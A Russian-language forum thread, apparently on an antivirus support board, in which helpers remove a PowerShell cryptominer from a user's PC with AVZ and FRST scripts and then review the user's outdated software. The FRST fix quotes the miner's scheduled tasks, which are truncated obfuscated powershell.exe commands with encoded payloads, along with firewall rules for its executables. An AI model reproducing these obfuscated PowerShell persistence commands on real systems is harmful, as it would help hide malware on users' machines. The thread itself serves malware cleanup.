Перейти к содержанию

[РЕШЕНО] Вирус майнер powershell.exe на процессор


Рекомендуемые сообщения

Здравствуйте!

 

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):

begin
 DeleteSchedulerTask('Microsoft\Windows\MUI\163546389');
 DeleteSchedulerTask('Microsoft\Windows\MUI\1750695736');
 DeleteSchedulerTask('Microsoft\Windows\PI\PI');
RebootWindows(false);
end.

 

Компьютер перезагрузится.

 

Для повторной диагностики запустите снова AutoLogger. Прикрепите новый CollectionLog.

Ссылка на сообщение
Поделиться на другие сайты

Дополнительно:

 

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе.
Когда программа запустится, нажмите Да для соглашения с предупреждением.

Нажмите кнопку Сканировать (Scan).
После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.
 

Ссылка на сообщение
Поделиться на другие сайты

Примите к сведению - после выполнения скрипта (возможно) все открытые вкладки браузеров будут закрыты, произойдет выход из аккаунтов, временные файлы, корзина, история браузеров, куки и кэш будут очищены.

  • Отключите до перезагрузки антивирус.
  • Выделите следующий код:
    Start::
    SystemRestore: On
    CreateRestorePoint:
    HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ограничение <==== ВНИМАНИЕ
    Task: {1C8B329C-1F9B-4426-8ADD-DF65C85D0457} - System32\Tasks\Microsoft\Windows\PI\PI => powershell.exe -c "$IPOgT='v23EQopQvSiUV5QNjV3fUMlb3FLTVJhNphWfXacSgm+aYKpS63WPZvFPtgWMOtIFmjOXDvNh0UTMRsZC3EjGQthGxkLbUrtaqGekKPYX73TDT9cH43KfDJ5Ti2avFI4GiQSNXpgYmE+BTcwZyjGfYeRi5m+UbbwHgxCZZuQN0EeQTa98xEKUBYQcwVSaTbMjkQOcFf9PwnftJMkG+VacEY0F/2mlWsE+i3bhFZtKzAXBS8wCxjGEHIcHqX+Ne9hk9m+JZv8VxUSedekTnVjBE6VNigOIMY8V (запись имеет ещё 3549 символов).
    Task: {A615B7E5-27B6-4047-AB3B-E5D8C4783A78} - System32\Tasks\Microsoft\Windows\MUI\1750695736 => powershell.exe -c "1543613767;$YOVj='SeSuTJ)jfqLxas.iyK(JaieqxQ';$rep_var='[&(ygc0m aA*0-T3y*4)._Na9me) (=''__us-0i{n),g __S=y6/st/ce_m5f;u_{siiybng__ gS__ysrhteef_m.__I,Oig;u_.smi_qng+_ bS[tys__tde?_m.lkRiuqynt]liwmf7e.y/I_n6tte_3rvo?}pSl!e_r_0vi__c_e,cs;_vutsgqin_8gk {6Mirqchr__os0po/fd_t.4)Wfin+n3-q2b;+-pu/wb_l (запись имеет ещё 2500 символов).
    CHR StartupUrls: Default -> "hxxps://vk.com/im?peers=139516936_c46_c64_245366278_136049823_56026904_c65&sel=c62","hxxps://vk.com/im?sel=307304384","chrome://newtab/","hxxps://stepik.org/catalog?q=%D0%BC%D0%B0%D1%82%D0%B5%D0%BC%D0%B0%D1%82%D0%B8%D1%87%D0%B5%D1%81%D0%BA%D0%B8%D0%B9%20%D0%B0%D0%BD%D0%B0%D0%BB%D0%B8%D0%B7","hxxps://stepik.org/course/716/promo","hxxps://stepik.org/course/711/promo","hxxps://www.google.com/search?newwindow=1&rlz=1C1SQJL_ruRU857RU857&sxsrf=ACYBGNRf0PVenr39jEA8oYJvAERW8IM_Lg%3A1568740374313&ei=FhSBXdTTEtuHwPAPkO-viAw&q=%D0%B4%D0%BE%D0%B3%D0%BE%D0%B2%D0%BE%D1%80+%D0%BE+%D1%81%D0%BE%D0%B7%D0%B4%D0%B0%D0%BD%D0%B8%D0%B8+%D1%81%D1%81%D1%81%D1%80+1922&oq=%D0%B4%D0%BE%D0%B3%D0%BE%D0%B2%D0%BE%D1%80+%D0%BE+%D1%81%D0%BE%D0%B7%D0%B4%D0%B0%D0%BD%D0%B8%D0%B8+%D1%81%D1%81%D1%81%D1%80+1922&gs_l=psy-ab.3..35i39j0i22i30l6.11153.12417..12753...0.2..0.126.672.2j4......0....1..gws-wiz.......0i71.0v38eMWHxEc&ved=0ahUKEwjUtoWmrdjkAhXbAxAIHZD3C8EQ4dUDCAs&uact=5","hxxp://doc.histrf.ru/20/deklaratsiya-i-dogovor-ob-obrazovanii-soyuza-sovetskikh-sotsialisticheskikh-respublik/","hxxps://ru.wikisource.org/wiki/%D0%94%D0%BE%D0%B3%D0%BE%D0%B2%D0%BE%D1%80_%D0%BE%D0%B1_%D0%BE%D0%B1%D1%80%D0%B0%D0%B7%D0%BE%D0%B2%D0%B0%D0%BD%D0%B8%D0%B8_%D0%A1%D0%BE%D1%8E%D0%B7%D0%B0_%D0%A1%D0%BE%D0%B2%D0%B5%D1%82%D1%81%D0%BA%D0%B8%D1%85_%D0%A1%D0%BE%D1%86%D0%B8%D0%B0%D0%BB%D0%B8%D1%81%D1%82%D0%B8%D1%87%D0%B5%D1%81%D0%BA%D0%B8%D1%85_%D0%A0%D0%B5%D1%81%D0%BF%D1%83%D0%B1%D0%BB%D0%B8%D0%BA"
    Folder: C:\ProgramData\Extensions
    FirewallRules: [{ED537BA2-22D7-4C68-84AE-967F4403F118}] => (Allow) C:\ProgramData\Windows\Profile\wasp.exe => Нет файла
    FirewallRules: [{6C270BC1-5402-4250-9AE6-B0BD07AB2BC8}] => (Allow) C:\ProgramData\Windows\Profile\waspwing.exe => Нет файла
    FirewallRules: [{99516214-F486-4203-B3FC-2297CB38B0EA}] => (Allow) C:\ProgramData\Windows\Profile\wasp.exe => Нет файла
    FirewallRules: [{FB74404D-A9FE-45D2-92E7-746040380EED}] => (Allow) C:\ProgramData\Windows\Profile\waspwing.exe => Нет файла
    FirewallRules: [{E447C7E9-38A2-45E4-845C-91F3B6CF6ABA}] => (Allow) C:\ProgramData\Windows\Profile\wasp.exe => Нет файла
    FirewallRules: [{9988C843-EFA8-4BF1-A73D-30DAD54E47D4}] => (Allow) C:\ProgramData\Windows\Profile\waspwing.exe => Нет файла
    FirewallRules: [{4405E540-D736-4915-8552-EA2199C97869}] => (Allow) C:\ProgramData\Windows\Profile\wasp.exe => Нет файла
    FirewallRules: [{B396DD8C-C26F-411F-B43D-3CB6300A1B0A}] => (Allow) C:\ProgramData\Windows\Profile\waspwing.exe => Нет файла
    ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions
    EmptyTemp:
    Reboot:
    End::

     

  • Скопируйте выделенный текст (правой кнопкой - Копировать).
  • Запустите FRST (FRST64) от имени администратора.
  • Нажмите Исправить (Fix) один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.


Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.

Ссылка на сообщение
Поделиться на другие сайты

Хорошо, только в завершение и на будущее проделайте:

 

1.

Переименуйте FRST.exe (или FRST64.exe) в uninstall.exe и запустите.
Компьютер перезагрузится.

Остальные утилиты лечения и папки можно просто удалить.
 

2.

  • Загрузите SecurityCheck by glax24 & Severnyj, сохраните утилиту на Рабочем столе и извлеките из архива.
  • Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/8.1/10/11)
  • Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работу
  • Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt
  • Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt
  • Прикрепите этот файл к своему следующему сообщению.

Ссылка на сообщение
Поделиться на другие сайты

---------------------- [ AntiVirusFirewallInstall ] -----------------------
Malwarebytes version 4.4.11.149 v.4.4.11.149 Внимание! Скачать обновления
--------------------------- [ OtherUtilities ] ----------------------------
Git v.2.33.0.2 Внимание! Скачать обновления
NVIDIA GeForce Experience 3.23.0.74 v.3.23.0.74 Внимание! Скачать обновления
Foxit Reader v.10.1.1.37576 Внимание! Скачать обновления
^Локализованные версии могут обновляться позже англоязычных!^
------------------------------ [ ArchAndFM ] ------------------------------
7-Zip 19.00 (x64) v.19.00 Внимание! Скачать обновления
^Удалите старую версию, скачайте и установите новую.^
WinRAR 6.00 (64-разрядная) v.6.00.0 Внимание! Скачать обновления
--------------------------------- [ P2P ] ---------------------------------
qBittorrent 4.3.3 v.4.3.3 Внимание! Скачать обновления
-------------------------------- [ Java ] ---------------------------------
Java 8 Update 51 (64-bit) v.8.0.510 Внимание! Скачать обновления
^Удалите старую версию и установите новую (jre-8u321-windows-x64.exe)^
-------------------------------- [ Media ] --------------------------------
AIMP v.v4.70.2254, 12.08.2021 Внимание! Скачать обновления
---------------------------- [ UnwantedApps ] -----------------------------
CCleaner v5.84.9126 v.5.84.9126 Внимание! Подозрение на демо-версию антишпионской программы, программу для обновления драйверов, программу-оптимизатор или программу очистки реестра. Рекомендуется деинсталляция и сканирование ПК с помощью Malwarebytes Anti-Malware. Возможно Вы стали жертвой обмана или социальной инженерии. Компьютерные эксперты не рекомендуют использовать такие программы.
Unity Web Player (x64) (All users) v.4.6.6f2 Внимание! Приложение распространяется в рамках партнерских программ и сборников-бандлов. Рекомендуется деинсталляция. Возможно Вы стали жертвой обмана или социальной инженерии.
Кнопка "Яндекс" на панели задач v.2.2.1.54 Внимание! Приложение распространяется в рамках партнерских программ и сборников-бандлов. Рекомендуется деинсталляция. Возможно Вы стали жертвой обмана или социальной инженерии.
 

 

Читайте Рекомендации после удаления вредоносного ПО

Ссылка на сообщение
Поделиться на другие сайты
Гость
Эта тема закрыта для публикации ответов.
  • Похожий контент

    • Николай Вдовин
      От Николай Вдовин
      Хотел установить KIS22 скачав с официального сайта, при запуске выскакивает на короткое время окно установщика и закрывается. Проверил компьютер с помощью KVRT, в конце выбрал "нейтрализовать всё", перезагрузил компьютер. Попробовал запустить установщик KIS и в очередной раз та же ситуация с закрытием процесса (скорее всего майнер).
      На скринах результат работы KVRT.


      CollectionLog-2022.05.23-21.38.zip
    • uropek
      От uropek
      Здравствуйте, на компьютере постоянно появляются папки на общедоступных папках. Создаются папки см. скриншот
      в каждой из этих папок образуется файл vid001.exe
      kaspersky endpoint security опеределяет его как Worm.NSIS.BitMin.d, удаляет, но зловред появляется вновь спустя несколько минут.
      В сети более 40 машин, операционки разные: Win7, 8.1, 10, на каждой из них стоит лицензионный каспер, но от заражения это не уберегло. Помогите избавится.

      CollectionLog-2022.03.09-00.53.zip
    • Odnako
      От Odnako
      Доброго времени суток!
      Заметил, что ЦП загружается на 50-60%. При запуске диспетчера задач или его аналогов - процесс автоматически выключается. Удалось увидеть процесс в мониторе ресурсов (см. скриншот ниже)
      Использовал антивирусники Касперский, ESET NOD32, Dr.Web CureIt. Ничего из перечисленного не смогло обнаружить вредоносное устройство или проблему. 
      Помогите, пожалуйста, решить проблему и по возможности определить источник проблемы. 

      CollectionLog-2022.03.04-12.17.zip
    • RevMirin
      От RevMirin
      Последнее время появилась в диспетчере задача powershell.exe. Нагружает систему так, что даже браузер хром позавидует (Скрин скину ниже). Что мне делать? Сама программа не появляется, появляется только в диспетчере
      Очень надеюсь на вашу помощь

    • GaL
      От GaL
      CollectionLog-2022.01.27-12.54.zip
×
×
  • Создать...